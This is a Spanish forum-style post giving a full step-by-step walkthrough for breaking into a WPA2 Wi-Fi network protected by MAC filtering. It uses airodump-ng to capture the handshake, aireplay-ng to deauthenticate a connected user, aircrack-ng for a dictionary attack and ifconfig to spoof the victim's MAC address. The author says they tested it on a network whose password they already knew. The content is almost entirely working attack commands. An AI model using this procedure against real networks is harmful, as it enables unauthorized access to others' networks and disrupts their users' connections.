Solucionado!

Primero puse mi inalámbrica en modo monitor (sólo válido para drivers madwifi):
sudo airmong-ng stop ath0 (mi interfaz es ath0, pero puede variar)
sudo airmong-ng start wifi0 5 (el 5 es porque la red la tengo en el canal 5)
Con airodump detecto las redes, y apunto las MACs que necesito (la del AP y la d
e un usuario conectado):
sudo airodump-ng ath0
Especifico la red que quiero monitorizar y la monitorizo, para capturar los 4 pa
quetes handshake:
sudo airodump-ng -c 5 --bssid xx:xx:xx:xx:xx:xx -w salida ath0
(En bssid hay que poner la MAC de AP, en c el canal de la red. 'salida' es el fi
chero donde se guardarán los paquetes)
Ahora hay que deautenticar al usuario para que se vuelva a conectar y genere los
paquetes:
sudo aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy ath0
(El '-0' significa deautenticacion, el '1' las deautenticaciones que se envían, de
spués de la '-a' hay que poner la MAC del AP, y después de la '-c' la MAC del usuari
o que queremos deautenticar)
Si sale algo como esto lo más probable es que lo hayamos hecho bien, y con un poco
de suerte consigamos nuestro objetivo:
Sending DeAuth to station -- STMAC: [zz:zz:zz:zz:zz:zz>
Bueno ya tenemos los 4 paquetes necesarios para crackear la contraseña, así que pode
mos cerrar airodump-ng. Ahora deberíamos buscar un buen diccionario para utilizar
con aircrack (esta es la peor parte...).
sudo aircrack-ng -w diccionario.lst salida.cap
(después de '-w' hay que poner el path completo del diccionario. 'salida.cap' es e
l fichero generado por airodump-ng que contiene los paquetes capturados)
Ya es cuestión de tiempo (si la contraseña es complicada, será cuestión de mucho tiempo)
que averigüemos la contraseña.
Yo como ya sabía la contraseña, la incluí en el diccionario (para no tener que esperar
todo el tiempo que le llevara dar con la combinación) y funcionó perfectamente.
No sé si tomarme esto como un logro por haber "crackeado" (en realidad no la crack
ee porque ya la sabía desde el principio, y la incluí a posta en el diccionario) una
red wifi con filtrado MAC y encriptación WPA2, o como que cualquiera con un poco
de tiempo puede colarse en cualquier red wifi.
Ah, me falta por mencionar que para conectarme necesito cambiar mi MAC por la de
l usuario:
Bajamos la interfaz de la red: /etc/init.d/networking stop
Cambiamos la direccion MAC: ifconfig ath0 hw ether xx:xx:xx:xx:xx:xx
(xx:xx:xx:xx:xx:xx es la dirección que queremos ponernos; en este caso la del usua
rio de la red)
Levantamos la interfaz: /etc/init.d/networking start
Este cambio es temporal, o sea que la próxima vez que iniciemos volveremos a tener
la MAC que teníamos antes. Para cambio permanente agregar al archivo de configura
ción de la red (que normalmente está en /etc/sysconfig/network) una línea al final que
ponga: MACADDR=xx:xx:xx:xx:xx:xx